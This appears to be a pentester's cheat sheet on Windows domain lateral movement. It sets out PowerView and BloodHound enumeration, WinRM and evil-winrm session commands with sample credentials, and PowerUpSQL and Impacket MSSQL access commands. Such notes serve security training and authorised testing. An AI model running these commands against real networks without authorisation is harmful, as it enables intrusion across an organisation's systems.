Few Lateral Movements

Windows domain movement can be done through:

RDP: Provides GUI access to a remote host.
PowerShell Remoting (WinRM): Enables remote command execution.
MSSQL Server: Sysadmin accounts can run remote queries and OS commands.

Enumeration is easiest with BloodHound, which maps CanRDP, CanPSRemote, and SQLAdmin privileges.

RDP

# Enumerate
## PowerView Command
Get-NetLocalGroupMember -ComputerName <WORKSTATION-NAME> -GroupName "Remote Desktop Users"

## Bloodhound is L33T for enumerating :D

WinRM

# Enumerate 
## PowerView Command
Get-NetLocalGroupMember -ComputerName <WORKSTATION-NAME> -GroupName "Remote Management Users"

We can use following Cypher query to hunt for CanPSRemote privileges.

Cypher query Bloodhound

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

WinRM Session

PowerShell
Linux

$Pass = ConvertTo-SecureString "Coolpass123@" -AsPlainText -Force
$Cred = new-object System.Management.Automation.PSCredential ("REZYDEV\jethalal", $Pass)
Enter-PSSession -ComputerName <WORKSTATION-NAME> -Credential $Cred

evil-winrm -i 10.10.10.10 -u rezydev -p Coolpass123@

Dedicated Evil-WinRM Notes:

Evil-WinRM

SQL Server Admin

BloodHound

We can check for SQL Admin rights in the Node Info tab of a given user.

Cypher query Bloodhound

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

PowerUpSQL

# Enumerate
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

# Authenticate
Get-SQLQuery -Verbose -Instance "192.168.1.7,1433" -username "rezydev\jethalal" -password "SQLPassword123@" -query 'Select @@version'

Impacket's `MSSQLClient.py`

python3 /path/to/mssqlclient.py REZYDEV/MSSQLSRV@192.168.1.7

## Use -windows-auth which Enables Windows authentication (NTLM) instead of
## using a SQL username/password.

RDP​

WinRM​

WinRM Session​

SQL Server Admin​

BloodHound​

PowerUpSQL​

Impacket's MSSQLClient.py ​

RDP